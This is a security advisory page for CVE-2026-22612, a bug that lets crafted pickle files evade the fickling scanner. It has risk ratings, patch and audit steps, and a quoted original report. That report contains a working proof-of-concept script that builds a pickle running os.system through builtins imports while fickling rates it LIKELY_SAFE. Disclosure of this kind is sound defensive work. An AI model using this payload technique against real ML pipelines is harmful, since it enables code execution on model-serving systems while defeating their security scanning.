CVE-2026-22612: fickling: Deserialization enables RCE

GHSA-h4rm-mm56-xf63 HIGH PoC AVAILABLE CISA: ATTEND
Published January 9, 2026
CISO Take

Fickling is widely used as a security gate to validate pickle files before loading ML models and datasets. This bypass means any pipeline relying on Fickling <= 0.1.6 can be silently evaded by crafted payloads that execute arbitrary code while returning a 'LIKELY_SAFE' verdict. Patch to 0.1.7 immediately and treat any prior Fickling LIKELY_SAFE verdicts as untrusted until re-scanned.

Risk Assessment

HIGH. The vulnerability is in a security control itself — Fickling is deployed specifically to catch malicious pickle files in ML pipelines. A working PoC is public, exploitability is moderate (requires pickle internals knowledge but no AI expertise), and the attack achieves full RCE while actively deceiving the scanner's data flow analysis. Impact is highest for organizations using Fickling as a sole gating control for model or dataset ingestion. EPSS is low today but PoC availability accelerates weaponization.

Affected Systems

Package Ecosystem Vulnerable Range Patched
fickling pip <= 0.1.6 0.1.7
622 OpenSSF 7.9 57 dependents Pushed 2d ago 100% patched ~5d to patch Full package profile →

Do you use fickling? You're affected.

Severity & Risk

CVSS 3.1
N/A
EPSS
0.1%
chance of exploitation in 30 days
Higher than 21% of all CVEs
Exploitation Status
Exploit Available
Exploitation: MEDIUM
Sophistication
Moderate
Exploitation Confidence
medium
CISA SSVC: Public PoC
Public PoC indexed (trickest/cve)
Composite signal derived from CISA KEV, CISA SSVC, EPSS, trickest/cve, and Nuclei templates.

Recommended Action

5 steps
  1. PATCH

    Upgrade fickling to >= 0.1.7 immediately. The fix emits AST import nodes for dangerous builtins functions.

  2. AUDIT

    Re-scan any pickle files previously cleared as LIKELY_SAFE by Fickling <= 0.1.6 — verdicts cannot be trusted retroactively.

  3. DEFENSE-IN-DEPTH: Never load pickle files from untrusted sources regardless of scanner verdict. Adopt safer serialization formats where possible: SafeTensors for model weights, ONNX for model exchange, JSON/Parquet for datasets.

  4. SANDBOX

    If pickle loading is unavoidable, run deserialization in isolated sandboxed environments (restricted namespaces, seccomp, containers) where OS-level calls fail even if payload executes.

  5. DETECT

    Search CI/CD and MLOps pipeline logs for Fickling LIKELY_SAFE verdicts on externally sourced pickle files as an indicator of potential exposure.

CISA SSVC Assessment

Decision Attend
Exploitation poc
Automatable Yes
Technical Impact total

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

Classification

Compliance Impact

This CVE is relevant to:

EU AI Act
Article 15 - Accuracy, Robustness and Cybersecurity Article 9 - Risk Management System
ISO 42001
A.6.2.3 - AI System Security A.8.5 - AI System Supplier Relationships
NIST AI RMF
MANAGE 2.4 - Residual risks are managed MAP 3.1 - Risks associated with AI system deployment and use are identified
OWASP LLM Top 10
LLM03:2025 - Supply Chain Vulnerabilities

Frequently Asked Questions

What is CVE-2026-22612?

Fickling is widely used as a security gate to validate pickle files before loading ML models and datasets. This bypass means any pipeline relying on Fickling <= 0.1.6 can be silently evaded by crafted payloads that execute arbitrary code while returning a 'LIKELY_SAFE' verdict. Patch to 0.1.7 immediately and treat any prior Fickling LIKELY_SAFE verdicts as untrusted until re-scanned.

Is CVE-2026-22612 actively exploited?

Proof-of-concept exploit code is publicly available for CVE-2026-22612, increasing the risk of exploitation.

How to fix CVE-2026-22612?

1. PATCH: Upgrade fickling to >= 0.1.7 immediately. The fix emits AST import nodes for dangerous builtins functions. 2. AUDIT: Re-scan any pickle files previously cleared as LIKELY_SAFE by Fickling <= 0.1.6 — verdicts cannot be trusted retroactively. 3. DEFENSE-IN-DEPTH: Never load pickle files from untrusted sources regardless of scanner verdict. Adopt safer serialization formats where possible: SafeTensors for model weights, ONNX for model exchange, JSON/Parquet for datasets. 4. SANDBOX: If pickle loading is unavoidable, run deserialization in isolated sandboxed environments (restricted namespaces, seccomp, containers) where OS-level calls fail even if payload executes. 5. DETECT: Search CI/CD and MLOps pipeline logs for Fickling LIKELY_SAFE verdicts on externally sourced pickle files as an indicator of potential exposure.

What systems are affected by CVE-2026-22612?

This vulnerability affects the following AI/ML architecture patterns: training pipelines, model serving, MLOps pipelines, model validation gates, dataset ingestion pipelines.

What is the CVSS score for CVE-2026-22612?

No CVSS score has been assigned yet.

Technical Details

NVD Description

#Fickling's assessment Fickling started emitting AST nodes for builtins imports in order to match them during analysis (https://github.com/trailofbits/fickling/commit/9f309ab834797f280cb5143a2f6f987579fa7cdf). # Original report ### Summary Fickling works by Pickle bytecode --> AST --> Security analysis However while going from bytecode to AST, some import nodes are removed which blinds the security analysis fickling/fickling/fickle.py ```python def run(self, interpreter: Interpreter): module, attr = self.module, self.attr if module in ("__builtin__", "__builtins__", "builtins"): # no need to emit an import for builtins! pass else: alias = ast.alias(attr) interpreter.module_body.append(ast.ImportFrom(module=module, names=[alias], level=0)) interpreter.stack.append(ast.Name(attr, ast.Load())) def encode(self) -> bytes: return f"c{self.module}\n{self.attr}\n".encode() ``` Here we see that no import nodes are emitted for builtins However builtins is marked as an unsafe import fickling/fickling/analysis.py ```python UNSAFE_MODULES = { "__builtin__": "This module contains dangerous functions that can execute arbitrary code.", "__builtins__": "This module contains dangerous functions that can execute arbitrary code.", "builtins": "This module contains dangerous functions that can execute arbitrary code.", ``` But because there are no import nodes for builtins (they werent emitted when making the AST), the security scanner is effectively blind. This can allow for security bypasses like this poc.py (script to create payload) ```python import os GLOBAL = b'c' # Import module.name STRING = b'S' # Push string TUPLE1 = b'\x85' # Build tuple of 1 TUPLE2 = b'\x86' # Build tuple of 2 EMPTY_TUPLE = b')' REDUCE = b'R' # Call function PUT = b'p' # Memoize (Variable assignment) GET = b'g' # Load from memo (Variable usage) POP = b'0' # Discard top of stack EMPTY_DICT = b'}' SETITEM = b's' # Add key/value to dict BUILD = b'b' # Update object state (Liveness satisfy) STOP = b'.' # Finish and return stack top def generate_raw_payload(): payload = b"" payload += GLOBAL + b"builtins\n__import__\n" payload += STRING + b"'os'\n" payload += TUPLE1 + REDUCE payload += PUT + b"0\n" # _var0 = os module payload += POP payload += GLOBAL + b"builtins\ngetattr\n" payload += GET + b"0\n" # os module payload += STRING + b"'system'\n" payload += TUPLE2 + REDUCE payload += PUT + b"1\n" # _var1 = os.system payload += POP payload += GET + b"1\n" # os.system payload += STRING + b"'whoami'\n" # COMMAND payload += TUPLE1 + REDUCE payload += PUT + b"2\n" payload += POP payload += GLOBAL + b"builtins\nException\n" payload += EMPTY_TUPLE + REDUCE payload += PUT + b"3\n" payload += EMPTY_DICT payload += STRING + b"'rce_status'\n" payload += GET + b"2\n" payload += SETITEM payload += BUILD payload += STOP return payload if __name__ == "__main__": data = generate_raw_payload() with open("raw_bypass.pkl", "wb") as f: f.write(data) print("Generated 'raw_bypass.pkl'") ``` This creates a pickle file which imports the OS module using __import__ which is a part of builtins. if the security scanner wasnt blinded it would have been flagged immidiately. However now fickling sees the pickle payload as ```python _var0 = __import__('os') _var1 = getattr(_var0, 'system') _var2 = _var1('whoami') _var3 = Exception() _var4 = _var3 _var4.__setstate__({'rce_status': _var2}) result0 = _var4 ``` <img width="810" height="182" alt="image" src="https://github.com/user-attachments/assets/5bfe8c34-7bc0-429f-83ce-d0c2f1928aca" /> As you can see there is no mention of builtins anywhere so it isnt flagged Additionally, the payload builder uses a technique to ensure that no variable get flagged as "UNUSED" We deceive the data flow analysis heuristic by using the BUILD opcode to update an objects internal state. By taking the result of os.system (the exit code) and using it as a value in a dictionary that is then "built" into a returned exception object, we create a logical dependency chain. The end result is that the malicious pickle gets classified as LIKELY_SAFE Fixes: Ensure that import objects are emitted for imports from builtins depending on what those imports are, say emit import nodes for dangerous functions like ```__import__``` while not emitting for stuff like ```dict()```

Exploitation Scenario

Adversary targeting an MLOps pipeline that pulls models from a public registry or shared storage crafts a malicious .pkl file using the disclosed PoC technique. The payload uses builtins.__import__ and builtins.getattr to construct an os.system() call, then chains the result through a BUILD opcode into an Exception object to satisfy Fickling's data flow liveness checks — no variable appears unused. When the organization's pipeline scans the file with Fickling <= 0.1.6, the scanner returns LIKELY_SAFE because builtins imports are never emitted as AST nodes and the UNSAFE_MODULES check never fires. The pipeline gates pass the model through to the inference server, which deserializes the pickle and executes the adversary's command with the server's privileges — establishing a foothold in the ML serving infrastructure.

Timeline

Published
January 9, 2026
Last Modified
January 11, 2026
First Seen
March 24, 2026

Related Vulnerabilities